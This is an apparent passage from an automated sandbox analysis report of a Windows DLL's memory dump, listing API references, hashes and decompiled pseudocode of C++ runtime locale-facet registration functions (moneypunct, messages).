Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDEBA2F
std::_Facet_Register.LIBCPMT ref: 6DDEBA46
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEBA66
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEBA84

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 46c0442b7c120d926259c641d21e07f24c755e21b0befaf1d8b053191f72510d
Instruction ID: 6e8b8521c264e5a2c4bb314263795dc538beb8163a31158d800cfea8a76f15fa
Opcode Fuzzy Hash: 46c0442b7c120d926259c641d21e07f24c755e21b0befaf1d8b053191f72510d
Instruction Fuzzy Hash: 6611C675808219DBCF05FB64C840BFDB7B4AF45718F174009F511AB290DFB4AA018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEBA8A, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DDEBA8A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t154 - 0x14, 0);
				_t147 =  *0x6de96e38; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6DDB161C(0x6de96e18);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6DDD66BA(_t154 - 0x14);
					return E6DDF0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6DDEC1A4(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t154 - 0x20);
							E6DDF3D74(_t154 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t143, _t147, 0x14);
							E6DDD6653(_t154 - 0x14, 0);
							_t148 =  *0x6de96e40; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6DDB161C(0x6de96e20);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6DDD66BA(_t154 - 0x14);
								return E6DDF0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6DDEC229(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t154 - 0x20);
										E6DDF3D74(_t154 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t110, _t144, _t148, 0x14);
										E6DDD6653(_t154 - 0x14, 0);
										_t149 =  *0x6de96e44; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6DDB161C(0x6de96e24);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6DDD66BA(_t154 - 0x14);
											return E6DDF0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6DDEC295(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6DDB1438(_t131);
													E6DDF3D74(_t154 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de3851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6de3c414;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6DDED028(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6DDF0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6DDD6FD3(__eflags, _t145);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6de96e44 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6DDD6FD3(__eflags, _t144);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6de96e40 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6DDD6FD3(__eflags, _t143);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6de96e38 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

0x6ddeba8a
0x6ddeba8a
0x6ddeba91
0x6ddeba9b
0x6ddebaa0
0x6ddebaab
0x6ddebaaf
0x6ddebab2
0x6ddebab7
0x6ddebabb
0x6ddebac0
0x6ddebac4
0x6ddebb09
0x6ddebb0c
0x6ddebb18
0x6ddebac6
0x6ddebac8
0x6ddebace
0x6ddebad4
0x6ddebadc
0x6ddebadf
0x6ddebb1c
0x6ddebb2a
0x6ddebb2f
0x6ddebb37
0x6ddebb41
0x6ddebb46
0x6ddebb51
0x6ddebb55
0x6ddebb58
0x6ddebb5d
0x6ddebb66
0x6ddebb68
0x6ddebb6a
0x6ddebbaf
0x6ddebbb2
0x6ddebbbe
0x6ddebb6c
0x6ddebb6c
0x6ddebb6e
0x6ddebb74
0x6ddebb7a
0x6ddebb82
0x6ddebb85
0x6ddebbc2
0x6ddebbd0
0x6ddebbd5
0x6ddebbdd
0x6ddebbe7
0x6ddebbec
0x6ddebbf7
0x6ddebbfb
0x6ddebbfe
0x6ddebc03
0x6ddebc0c
0x6ddebc0e
0x6ddebc10
0x6ddebc55
0x6ddebc58
0x6ddebc64
0x6ddebc12
0x6ddebc12
0x6ddebc14
0x6ddebc1a
0x6ddebc20
0x6ddebc28
0x6ddebc2b
0x6ddebc65
0x6ddebc68
0x6ddebc76
0x6ddebc7b
0x6ddebc83
0x6ddebc88
0x6ddebc8a
0x6ddebc90
0x6ddebc93
0x6ddebc9c
0x6ddebc9c
0x6ddebc9c
0x6ddebca0
0x6ddebca6
0x6ddebca9
0x6ddebcb5
0x6ddebc2d
0x6ddebc2d
0x6ddebc30
0x6ddebc34
0x6ddebc38
0x6ddebc45
0x6ddebc4d
0x6ddebc4f
0x00000000
0x6ddebc4f
0x6ddebc16
0x6ddebc16
0x00000000
0x6ddebc16
0x6ddebc14
0x6ddebb87
0x6ddebb87
0x6ddebb8a
0x6ddebb8e
0x6ddebb92
0x6ddebb9f
0x6ddebba7
0x6ddebba9
0x00000000
0x6ddebba9
0x6ddebb70
0x6ddebb70
0x00000000
0x6ddebb70
0x6ddebb6e
0x6ddebae1
0x6ddebae1
0x6ddebae4
0x6ddebae8
0x6ddebaec
0x6ddebaf9
0x6ddebb01
0x6ddebb03
0x00000000
0x6ddebb03
0x6ddebaca
0x6ddebaca
0x00000000
0x6ddebaca
0x6ddebac8

APIs

__EH_prolog3.LIBCMT ref: 6DDEBA91
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEBA9B
int.LIBCPMT ref: 6DDEBAB2

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDEBAD5
std::_Facet_Register.LIBCPMT ref: 6DDEBAEC
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEBB0C
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEBB2A

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 3bb58c6b522b429ed7bddc803a4d8c9068438ad26b35e1e6af61c9c6581bb5ff
Instruction ID: 0cf3da71255439a8acf546b93b7e7438ea7695fb59441a2a2dfec952350669b0
Opcode Fuzzy Hash: 3bb58c6b522b429ed7bddc803a4d8c9068438ad26b35e1e6af61c9c6581bb5ff
Instruction Fuzzy Hash: 2311C276908219DBCF01FBA4C840AFEB7B4AF45318F270009F511AB290DFB4AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF567, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDF56E
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF578
int.LIBCPMT ref: 6DDDF58F

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDDF5B2
std::_Facet_Register.LIBCPMT ref: 6DDDF5C9
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF5E9
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF607

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 3a5dfdc0b5aadda5e52500a7e801536c8d329c8e3c05306ba2d7da326e55a70c
Instruction ID: bbf2cf14f6da7ee62b644b220c3622372ad07b1e536659c19691d81e7bf8cfad
Opcode Fuzzy Hash: 3a5dfdc0b5aadda5e52500a7e801536c8d329c8e3c05306ba2d7da326e55a70c
Instruction Fuzzy Hash: 7311A076908119DBCF01FBA4C840ABEB775AF94318F260019F621AB290DF749A018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB7F2, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDEB7F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t330 - 0x14, 0);
				_t315 =  *0x6de96e2c; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6DDB161C(0x6de96e0c);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6DDD66BA(_t330 - 0x14);
					return E6DDF0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6DDEBFE8(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t330 - 0x20);
							E6DDF3D74(_t330 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t307, _t315, 0x14);
							E6DDD6653(_t330 - 0x14, 0);
							_t316 =  *0x6de96e30; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6DDB161C(0x6de96e10);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6DDD66BA(_t330 - 0x14);
								return E6DDF0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6DDEC050(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t330 - 0x20);
										E6DDF3D74(_t330 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t234, _t308, _t316, 0x14);
										E6DDD6653(_t330 - 0x14, 0);
										_t317 =  *0x6de96e34; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6DDB161C(0x6de96e14);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6DDD66BA(_t330 - 0x14);
											return E6DDF0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6DDEC0B8(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t330 - 0x20);
													E6DDF3D74(_t330 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t234, _t309, _t317, 0x14);
													E6DDD6653(_t330 - 0x14, 0);
													_t318 =  *0x6de96e3c; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6DDB161C(0x6de96e1c);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6DDD66BA(_t330 - 0x14);
														return E6DDF0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6DDEC120(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t330 - 0x20);
																E6DDF3D74(_t330 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t234, _t310, _t318, 0x14);
																E6DDD6653(_t330 - 0x14, 0);
																_t319 =  *0x6de96e38; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6DDB161C(0x6de96e18);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6DDD66BA(_t330 - 0x14);
																	return E6DDF0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6DDEC1A4(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t330 - 0x20);
																			E6DDF3D74(_t330 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t234, _t311, _t319, 0x14);
																			E6DDD6653(_t330 - 0x14, 0);
																			_t320 =  *0x6de96e40; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6DDB161C(0x6de96e20);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6DDD66BA(_t330 - 0x14);
																				return E6DDF0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6DDEC229(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t330 - 0x20);
																						E6DDF3D74(_t330 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t234, _t312, _t320, 0x14);
																						E6DDD6653(_t330 - 0x14, 0);
																						_t321 =  *0x6de96e44; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6DDB161C(0x6de96e24);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6DDD66BA(_t330 - 0x14);
																							return E6DDF0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6DDEC295(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6DDB1438(_t283);
																									E6DDF3D74(_t330 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de3851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6de3c414;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6DDED028(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6DDF0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6DDD6FD3(__eflags, _t313);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6de96e44 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6DDD6FD3(__eflags, _t312);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6de96e40 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6DDD6FD3(__eflags, _t311);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6de96e38 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6DDD6FD3(__eflags, _t310);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6de96e3c = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6DDD6FD3(__eflags, _t309);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6de96e34 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6DDD6FD3(__eflags, _t308);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6de96e30 = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6DDD6FD3(__eflags, _t307);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6de96e2c = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

0x6ddeb7f2
0x6ddeb7f2
0x6ddeb7f9
0x6ddeb803
0x6ddeb808
0x6ddeb813
0x6ddeb817
0x6ddeb81a
0x6ddeb81f
0x6ddeb823
0x6ddeb828
0x6ddeb82c
0x6ddeb871
0x6ddeb874
0x6ddeb880
0x6ddeb82e
0x6ddeb830
0x6ddeb836
0x6ddeb83c
0x6ddeb844
0x6ddeb847
0x6ddeb884
0x6ddeb892
0x6ddeb897
0x6ddeb89f
0x6ddeb8a9
0x6ddeb8ae
0x6ddeb8b9
0x6ddeb8bd
0x6ddeb8c0
0x6ddeb8c5
0x6ddeb8ce
0x6ddeb8d0
0x6ddeb8d2
0x6ddeb917
0x6ddeb91a
0x6ddeb926
0x6ddeb8d4
0x6ddeb8d4
0x6ddeb8d6
0x6ddeb8dc
0x6ddeb8e2
0x6ddeb8ea
0x6ddeb8ed
0x6ddeb92a
0x6ddeb938
0x6ddeb93d
0x6ddeb945
0x6ddeb94f
0x6ddeb954
0x6ddeb95f
0x6ddeb963
0x6ddeb966
0x6ddeb96b
0x6ddeb974
0x6ddeb976
0x6ddeb978
0x6ddeb9bd
0x6ddeb9c0
0x6ddeb9cc
0x6ddeb97a
0x6ddeb97a
0x6ddeb97c
0x6ddeb982
0x6ddeb988
0x6ddeb990
0x6ddeb993
0x6ddeb9d0
0x6ddeb9de
0x6ddeb9e3
0x6ddeb9eb
0x6ddeb9f5
0x6ddeb9fa
0x6ddeba05
0x6ddeba09
0x6ddeba0c
0x6ddeba11
0x6ddeba1a
0x6ddeba1c
0x6ddeba1e
0x6ddeba63
0x6ddeba66
0x6ddeba72
0x6ddeba20
0x6ddeba20
0x6ddeba22
0x6ddeba28
0x6ddeba2e
0x6ddeba36
0x6ddeba39
0x6ddeba76
0x6ddeba84
0x6ddeba89
0x6ddeba91
0x6ddeba9b
0x6ddebaa0
0x6ddebaab
0x6ddebaaf
0x6ddebab2
0x6ddebab7
0x6ddebac0
0x6ddebac2
0x6ddebac4
0x6ddebb09
0x6ddebb0c
0x6ddebb18
0x6ddebac6
0x6ddebac6
0x6ddebac8
0x6ddebace
0x6ddebad4
0x6ddebadc
0x6ddebadf
0x6ddebb1c
0x6ddebb2a
0x6ddebb2f
0x6ddebb37
0x6ddebb41
0x6ddebb46
0x6ddebb51
0x6ddebb55
0x6ddebb58
0x6ddebb5d
0x6ddebb66
0x6ddebb68
0x6ddebb6a
0x6ddebbaf
0x6ddebbb2
0x6ddebbbe
0x6ddebb6c
0x6ddebb6c
0x6ddebb6e
0x6ddebb74
0x6ddebb7a
0x6ddebb82
0x6ddebb85
0x6ddebbc2
0x6ddebbd0
0x6ddebbd5
0x6ddebbdd
0x6ddebbe7
0x6ddebbec
0x6ddebbf7
0x6ddebbfb
0x6ddebbfe
0x6ddebc03
0x6ddebc0c
0x6ddebc0e
0x6ddebc10
0x6ddebc55
0x6ddebc58
0x6ddebc64
0x6ddebc12
0x6ddebc12
0x6ddebc14
0x6ddebc1a
0x6ddebc20
0x6ddebc28
0x6ddebc2b
0x6ddebc65
0x6ddebc68
0x6ddebc76
0x6ddebc7b
0x6ddebc83
0x6ddebc88
0x6ddebc8a
0x6ddebc90
0x6ddebc93
0x6ddebc9c
0x6ddebc9c
0x6ddebc9c
0x6ddebca0
0x6ddebca6
0x6ddebca9
0x6ddebcb5
0x6ddebc2d
0x6ddebc2d
0x6ddebc30
0x6ddebc34
0x6ddebc38
0x6ddebc45
0x6ddebc4d
0x6ddebc4f
0x00000000
0x6ddebc4f
0x6ddebc16
0x6ddebc16
0x00000000
0x6ddebc16
0x6ddebc14
0x6ddebb87
0x6ddebb87
0x6ddebb8a
0x6ddebb8e
0x6ddebb92
0x6ddebb9f
0x6ddebba7
0x6ddebba9
0x00000000
0x6ddebba9
0x6ddebb70
0x6ddebb70
0x00000000
0x6ddebb70
0x6ddebb6e
0x6ddebae1
0x6ddebae1
0x6ddebae4
0x6ddebae8
0x6ddebaec
0x6ddebaf9
0x6ddebb01
0x6ddebb03
0x00000000
0x6ddebb03
0x6ddebaca
0x6ddebaca
0x00000000
0x6ddebaca
0x6ddebac8
0x6ddeba3b
0x6ddeba3b
0x6ddeba3e
0x6ddeba42
0x6ddeba46
0x6ddeba53
0x6ddeba5b
0x6ddeba5d
0x00000000
0x6ddeba5d
0x6ddeba24
0x6ddeba24
0x00000000
0x6ddeba24
0x6ddeba22
0x6ddeb995
0x6ddeb995
0x6ddeb998
0x6ddeb99c
0x6ddeb9a0
0x6ddeb9ad
0x6ddeb9b5
0x6ddeb9b7
0x00000000
0x6ddeb9b7
0x6ddeb97e
0x6ddeb97e
0x00000000
0x6ddeb97e
0x6ddeb97c
0x6ddeb8ef
0x6ddeb8ef
0x6ddeb8f2
0x6ddeb8f6
0x6ddeb8fa
0x6ddeb907
0x6ddeb90f
0x6ddeb911
0x00000000
0x6ddeb911
0x6ddeb8d8
0x6ddeb8d8
0x00000000
0x6ddeb8d8
0x6ddeb8d6
0x6ddeb849
0x6ddeb849
0x6ddeb84c
0x6ddeb850
0x6ddeb854
0x6ddeb861
0x6ddeb869
0x6ddeb86b
0x00000000
0x6ddeb86b
0x6ddeb832
0x6ddeb832
0x00000000
0x6ddeb832
0x6ddeb830

APIs

__EH_prolog3.LIBCMT ref: 6DDEB7F9
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB803
int.LIBCPMT ref: 6DDEB81A

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

messages.LIBCPMT ref: 6DDEB83D
std::_Facet_Register.LIBCPMT ref: 6DDEB854
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEB874
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEB892

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
